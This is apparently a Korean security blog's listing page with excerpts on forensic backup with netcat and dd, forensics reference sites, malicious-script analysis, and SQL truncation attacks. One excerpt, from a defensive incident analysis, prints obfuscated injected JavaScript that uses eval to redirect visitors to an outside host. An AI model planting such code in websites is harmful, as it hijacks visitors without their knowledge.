본문 바로가기

정보보호 (Security)331

윈도우 해킹피해 시스템 분석 - 초기분석 백업 먼저 젤로 중요한 백업이죠. 해킹당했으면 그걸 bit단위로 제대로 백업해서 다른데 풀어서 하는게 좋죠.. 백업하는데 필요한 도구들은 우리가 많이 쓰는 netcat(가볍지만 정말 유용한 프로그램입니다.)과 dd(리눅스에선 내장되어 있던데)입니다. netcat -> http://www.atstake.com/ 다운로드 http://www.searchlore.org/aznetcat.htm(예제) dd -> http://unxutils.sourceforge.net/ 다운로드 dd뿐만이 아니라 리눅스에서 유용하게 쓰였는데 윈도우에 없는 명령어들이 많이 담겨 있습니다. 위 사이트 참조 위 두개의 명령어로 사용한 예제 분석 시스템(192.168.1.1) 2002/tcp 포트로 들어오는 데이터를 backup.img.. 2009. 3. 5.
포렌식 관련 참고 사이트 모음 사고대응관련 기관 국내 CERTCC-KR - http://www.certcc.or.kr/ SecurityMap.Net IRC - http://www.securitymap.net/ KRNIC - http://ip.nic.or.kr/ CONCERT - http://www.concert.or.kr/ 경찰청 - http://www.ctrc.go.kr/ 검찰청 - http://icic.sppo.go.kr/ 국정원 - http://www.nis.go.kr/ 국외 FIRST - http://www.first.org/ APCERT - http://www.apcert.org/ TF-CERT - http://www.terena.nl/tech/task-forces/tf-csirt/ ■ 취약성 정보 제공 사이트 CVE htt.. 2009. 3. 5.
여러가지 취약점으로 공격하는 악성 스크립트 분석 출처 : http://malwarelab.tistory.com/ 엊그제 네x버의 SecurityPlus 까페에 갔다가 획득하게 된 파일들입니다. 다운 받은 파일은 html과 js 파일이었는데 결국 하나의 파일을 통해 iframe이나 script로 연결된 파일들이었습니다. 가장 먼저 나오는놈부터 보겠습니다. help.htm bir.js 파일이 script 태그를 통해 삽입되고 있습니다. 바로 아래에는 익숙한 도메인이 보이는군요.. 현재 두번째 스크립트는 스크립트로써 동작하지 않고 그냥 텍스트 형태로 문자열만 보이고 있습니다. 그럼 bir.js 파일을 보도록 하겠습니다. 그냥 딱 보기에도 악성스크립트인게 보입니다. 정상적인 스크립트라면 이런식으로 인코딩하지 않겠죠.. 뭔가 구린게 있으니 인코딩을 하는거겠죠?.. 2009. 3. 5.
해외에서 삽입한 악성코드 아닌 광고코드 분석 관리중인 모 사이트에 아래와 같은 악성코드는 아닌 광고코드가 삽입되었으며, 침해 분석 결과 해외 아이피로 확인되었음. 일단 침해된 방법에 대해서는 차단하였으나 추가적인 시도 가능성 모니터링 필요. -- 삽입코드 -- 정상 코드로 변환하여.. -- 원형 코드 -- 추가 다운로드 코드 (bidch.js) -- que 입력값 : test -- 소스 코드 -- function f(str) { z="ion='"; d="win"; c="cat"; f7=str; b="dow.lo"; g="';"; i=7; j=21; if (j-14==i) eval(d+b+c+z+f7+g); } f('http://bestforyou.if.ua/feed/search.php?q=test'); -- 원형 코드 -- window.locati.. 2009. 3. 3.
새로운 SQL 잘라내기 공격 및 대처 방법 2006년 http://msdn.microsoft.com/ko-kr/magazine/cc163523.aspx 2008년 http://www.dbguide.net/know/know109001.jsp SQL 주입을 이용하는 공격은 방화벽과 침입 검색 시스템을 통과해서 데이터 계층을 손상시킬 수 있다는 점 때문에 많은 관심을 끌었습니다. 기본 코드 패턴을 보면 1차 또는 2차 주입 모두 문을 생성할 때 신뢰할 수 없는 데이터를 사용한 경우에 발생하는 다른 주입 문제와 비슷합니다. 대부분의 개발자는 백 엔드에서 매개 변수가 있는 SQL 쿼리를 저장 프로시저와 함께 사용하여 웹 프런트 엔드의 취약점을 완화하고 있지만, 사용자 입력 기반의 DDL(데이터 정의 언어) 문을 생성하는 경우 또는 C/C++로 작성된 응용.. 2009. 3. 2.